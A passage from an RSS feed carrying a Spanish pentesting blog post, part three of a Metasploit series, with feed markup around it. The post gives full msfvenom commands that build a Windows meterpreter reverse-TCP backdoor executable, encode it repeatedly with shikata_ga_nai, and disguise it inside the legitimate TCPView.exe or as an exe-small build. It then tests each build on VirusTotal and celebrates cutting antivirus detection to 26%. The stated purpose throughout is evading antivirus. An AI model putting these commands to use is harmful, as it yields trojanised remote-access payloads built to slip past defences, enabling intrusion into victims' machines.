&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=o3pl02tG2xE:AcIvybqxnAc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=o3pl02tG2xE:AcIvybqxnAc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=o3pl02tG2xE:AcIvybqxnAc:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=o3pl02tG2xE:AcIvybqxnAc:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/o3pl02tG2xE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/o3pl02tG2xE/OWASP-Parte3MetodologiaAppMobile.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-TuYxepHRfnU/UWKhpxqqppI/AAAAAAAAEPs/Tc6xLaUWwPo/s72-c/OWASP_Part3.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/04/OWASP-Parte3MetodologiaAppMobile.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-2602945961788058089</guid><pubDate>Sat, 23 Mar 2013 17:54:00 +0000</pubDate><atom:updated>2013-03-23T19:02:53.982+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">PAYLOAD</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">ENCODE</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">MSFP</category><category domain="http://www.blogger.com/atom/ns#">Part 3</category><title>Metasploit: de ENCODING y PAYLOAD va la cosa (III)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-aMCzQV4Y05k/UUx8D4UNSmI/AAAAAAAAEOY/nb7dxpeNMiE/s1600/MSFPayload_parte3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-aMCzQV4Y05k/UUx8D4UNSmI/AAAAAAAAEOY/nb7dxpeNMiE/s1600/MSFPayload_parte3.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="text-align: justify;"&gt;En la &lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" style="text-align: justify;" target="_blank"&gt;primera parte&lt;/a&gt;&lt;span style="text-align: justify;"&gt; se hizo una introducción a los comandos de #Metasploit para la creación y manipulación de los PAYLOAD, realizando un ejemplo de utilización, en particular con el comando &lt;/span&gt;&lt;b style="text-align: justify;"&gt;msfpayload&lt;/b&gt;&lt;span style="text-align: justify;"&gt;.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Ya en la &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" target="_blank"&gt;segunda entrega&lt;/a&gt;, se trabajo con el comando &lt;b&gt;msfencode&lt;/b&gt; para aplicar técnicas de evasión de IDS/IPS/AV a un PAYLOAD determinado, el objetivo es conseguir un ejecutable para windows con el menor número de detecciones posible en virustotal.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si recordáis, en los ejemplos propuestos en el &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" target="_blank"&gt;artículo anterior&lt;/a&gt;, con msfencode, no se logró reducir el número de detecciones, siendo nuestro ejecutable (backdoor4.exe) detectado por la gran mayoría de los sistema de Antivirus, en el &lt;u&gt;&lt;b&gt;artículo de hoy&lt;/b&gt;&lt;/u&gt;, se va a generar un ejecutable utilizando &lt;b&gt;msfvenom&lt;/b&gt;&amp;nbsp;y veremos como facilita las cosas en el nuevo comando con respecto a los anteriores.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;span style="background-color: orange;"&gt;&lt;span style="border: none; color: #3a3a3a; font-family: Arial, sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&lt;b&gt;INDICE:&lt;/b&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;Parte 1&lt;/a&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;|&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;Parte 2&lt;/a&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload3.html" target="_blank"&gt;Parte 3&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="border: none; color: white; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Ejemplos de USO (tercera parte)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Ante de comenzar conviene recordar en que consiste el comando msfvenom. Es un comando que unifica msfpayload y msfencode en uno solo, mayor&amp;nbsp;rapidez&amp;nbsp;y facilidad de uso. Además de incluir la capacidad de introducir NOPS al ejecutable generado, proporcionando otra forma más en el intento de evitar ser detectado por el sistema antivirus.&lt;/div&gt;
&lt;br /&gt;
&lt;u&gt;Ejemplo 3&lt;/u&gt;:&lt;br /&gt;
&lt;br /&gt;
Vamos a comenzar por el principio, puesto que el comando msfvenom unifica el PAYLOAD y las técnicas de ENCODING bajo uno solo.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: white;"&gt;&lt;span style="background-color: #e06666;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 1&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt;: La elección del PAYLOAD &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En la &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" target="_blank"&gt;segunda parte&lt;/a&gt;, ya empezamos a intuir que la elección del PAYLOAD es fundamental para evitar ser detectado, tanto o incluso más aún que la técnica de ofuscación del código que utilicemos, pues la detección&amp;nbsp;heurística&amp;nbsp;de los sistema antivirus enfatiza su detección en la carga (payload). Bueno dejemos de lado, la filosofía del funcionamiento de los antivirus para centrarnos en el artículo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;root@ST2Labs&amp;nbsp;&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;gt; msfvenom --list payloads&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-z5uJy60Vwlg/UUw0IsefgKI/AAAAAAAAEMY/NUP8sCmzCB0/s1600/MSF_venom-payload.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="438" src="http://3.bp.blogspot.com/-z5uJy60Vwlg/UUw0IsefgKI/AAAAAAAAEMY/NUP8sCmzCB0/s640/MSF_venom-payload.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfvenom --list payloads [Listar los payloads disponibles]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 2&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt; Configuración de los&amp;nbsp;parámetros&amp;nbsp;de PAYLOAD &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para ver que&amp;nbsp;parámetros&amp;nbsp;de configuración son necesarios para el PAYLOAD escogido (windows/meterpreter/reverse_ord_tcp), se ejecuta lo siguiente:&lt;/div&gt;
&lt;br /&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;"&gt;root@ST2Labs&amp;nbsp;&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;"&gt;&amp;gt; msfvenom -p windows/meterpreter/reverse_ord_tcp -o&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-4Vez4BAU4bw/UUw09qxVLfI/AAAAAAAAEMg/_UHwb7MXoZs/s1600/MSF_venom-payload-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="154" src="http://1.bp.blogspot.com/-4Vez4BAU4bw/UUw09qxVLfI/AAAAAAAAEMg/_UHwb7MXoZs/s640/MSF_venom-payload-1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfvenom -o [ Ver las opciones de configuración del payload]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
La&lt;b&gt; elección del PAYLOAD&lt;/b&gt; (windows/meterpreter/reverse_ord_tcp) incluye la conexión inversa del tipo ORD, para generar un PAYLOAD con toda la funcionalidad de meterpreter con un menor tamaño, que nos ayude en nuestra tarea de evadir al Antivirus.&lt;/div&gt;
&lt;br /&gt;
Llego el momento, ahora que tenemos el PAYLOAD, se va generar el fichero ejecutable con un sólo comando:&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #e06666; color: #e06666;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 3:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt;Generación del ejecutable (EXE) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En esta ocasión he&amp;nbsp;decidido&amp;nbsp;cambiar el nombre del archivo generado por &lt;b&gt;p.exe&lt;/b&gt;, en el ejemplo&amp;nbsp;veréis&amp;nbsp;que voy por la prueba número seis, es decir p6.exe, las anteriores pruebas han sido probando con otros PAYLOAD y el resultado ha sido similar, por lo que no he&amp;nbsp;creído&amp;nbsp;interesante incluirlo en el artículo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #eeeeee;"&gt;&lt;b&gt;r&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="background-color: #eeeeee;"&gt;oot@ST2Labs&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #eeeeee;"&gt; &amp;gt; msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 20 -f exe LHOST=192.168.2.105 &amp;gt; p6.exe&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-5gTrfM_qMMg/UUw34pzUz1I/AAAAAAAAEMo/uMr75LadDYA/s1600/MSF_venom--1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="188" src="http://1.bp.blogspot.com/-5gTrfM_qMMg/UUw34pzUz1I/AAAAAAAAEMo/uMr75LadDYA/s640/MSF_venom--1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfvenom [Generación de EXE con encoding x86/shikata_ga_nai]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="text-align: justify;"&gt;Como se puede observar en la imagen superior, se ha utilizado el encoding x86/shikata_ga_nai con la restricción del uso de los caracteres '\x00\x20\x0a\x0d', y el PAYLOAD comentado en las líneas anteriores.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
El resultado de virustotal es:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-yn_CBuCUbNg/UUw62V2_6sI/AAAAAAAAEMw/rQ6AQp4gnJg/s1600/MSF_venom-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-yn_CBuCUbNg/UUw62V2_6sI/AAAAAAAAEMw/rQ6AQp4gnJg/s1600/MSF_venom-2.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Análisis&amp;nbsp;de virustotal.com&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;¿Qué esta pasando?&lt;/b&gt; Parece que los motores de antivirus tienen identificado al PAYLOAD meterpreter generado por metasploit, a pasar de incluir la ofuscación&amp;nbsp;polimórfica. Pero ¿esta todo&amp;nbsp;perdido?&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: white;"&gt;&lt;span style="background-color: #e06666;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 4&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt; Utilización de template (EXE) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
El template tomar como modelo en la generación la estructura de otro ejecutable no malicioso para la generación del ejecutable (EXE) final. Para este ejemplo utilizare el programa &lt;a href="http://technet.microsoft.com/es-es/sysinternals/bb897437.aspx" target="_blank"&gt;TCPview.exe&lt;/a&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;r&lt;/b&gt;&lt;/span&gt;&lt;b style="text-align: justify;"&gt;&lt;span style="background-color: #eeeeee;"&gt;oot@ST2Labs&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&amp;nbsp;&amp;gt; msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 20 -f exe -x Tcpview.exe LHOST=192.168.2.105 &amp;gt; tcpviewmod.exe&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Parece apropiado nombrar en esta ocasión al fichero como tcpviewmod.exe, lo subimos a virustotal y:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-EHWJBFyz5V8/UUw8qXl2VyI/AAAAAAAAENA/-uBhydUYCwQ/s1600/MSF_venom-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-EHWJBFyz5V8/UUw8qXl2VyI/AAAAAAAAENA/-uBhydUYCwQ/s1600/MSF_venom-3.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Análisis&amp;nbsp;virustotal para PAYLOAD con template tcpview.exe&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;b&gt;¡¡ Tachán !! &lt;/b&gt;Acabamos de reducir considerablemente la capacidad de detección de nuestro ejecutable, sin embargo, los principales motores de antivirus siguen detectando nuestro ejecutable.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Se empieza a intuir que la utilización del template nos ha ayudado, ha creado un ejecutable con una estructura similar al TCPview.exe, y ha funcionado, ¿significa esto que la efectividad de la evasión rádica en la estructura que genera el ejecutable? o ¿la capacidad de generar un ejecutable que no se parezca en nada a un ejecutable con payload meterpreter por defecto? &lt;b&gt;La respuesta es ambas cosas&lt;/b&gt;, de ahí que se utilicen las técnicas de ofuscación (encoding).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 5&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt; Utilización del formato exe-small, generación de un ejecutable diferente al normal y/o por defecto.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Sin template&lt;/b&gt;: TCPview.exe&lt;br /&gt;
Opción_ exe-small&lt;br /&gt;
Nombre: tcpviewmod2.exe (simplmente para guardar relación con el paso 4)&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;r&lt;/b&gt;&lt;/span&gt;&lt;b style="text-align: justify;"&gt;&lt;span style="background-color: #eeeeee;"&gt;oot@ST2Labs&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&amp;nbsp;&amp;gt; msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 20 -f exe-small LHOST=192.168.2.105 &amp;gt; tcpviewmod2.exe&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Lo subimos a VirusTotal:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-rOT2Bk6zWH8/UUw-s5FtQ0I/AAAAAAAAENI/MafK3xcGrCI/s1600/MSF_venom-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-rOT2Bk6zWH8/UUw-s5FtQ0I/AAAAAAAAENI/MafK3xcGrCI/s1600/MSF_venom-4.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Análisis&amp;nbsp;virustotal para PAYLOAD con generación exe-small.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;b&gt;¡¡ Tachán !! &amp;nbsp;&lt;/b&gt;&lt;b&gt;¡¡ Tachán !!&amp;nbsp;&lt;/b&gt;&lt;b&gt;¡¡ Tachán !!&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
Acabamos de generar un ejecutable que es detectado por tan solo el 26% de los motores de antivirus, aquí se incluyen algunos como por ejemplo (TrendMicro / Symantec):&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-YrCJCoGbtoo/UUw_RpfUpMI/AAAAAAAAENQ/s2Mrp_J1YnQ/s1600/MSF_encode-3_vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="348" src="http://1.bp.blogspot.com/-YrCJCoGbtoo/UUw_RpfUpMI/AAAAAAAAENQ/s2Mrp_J1YnQ/s640/MSF_encode-3_vt.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
O Karpesky y Windows Defender (Microsoft), ver imagen siguiente:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-SyQX9U6yXlQ/UUw_rfdRkzI/AAAAAAAAENY/3uD_6WaMQMU/s1600/MSF_encode-3_vt2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="352" src="http://3.bp.blogspot.com/-SyQX9U6yXlQ/UUw_rfdRkzI/AAAAAAAAENY/3uD_6WaMQMU/s640/MSF_encode-3_vt2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Os invito a vosotros a realizar vuestras propias pruebas, por supuesto:&lt;br /&gt;
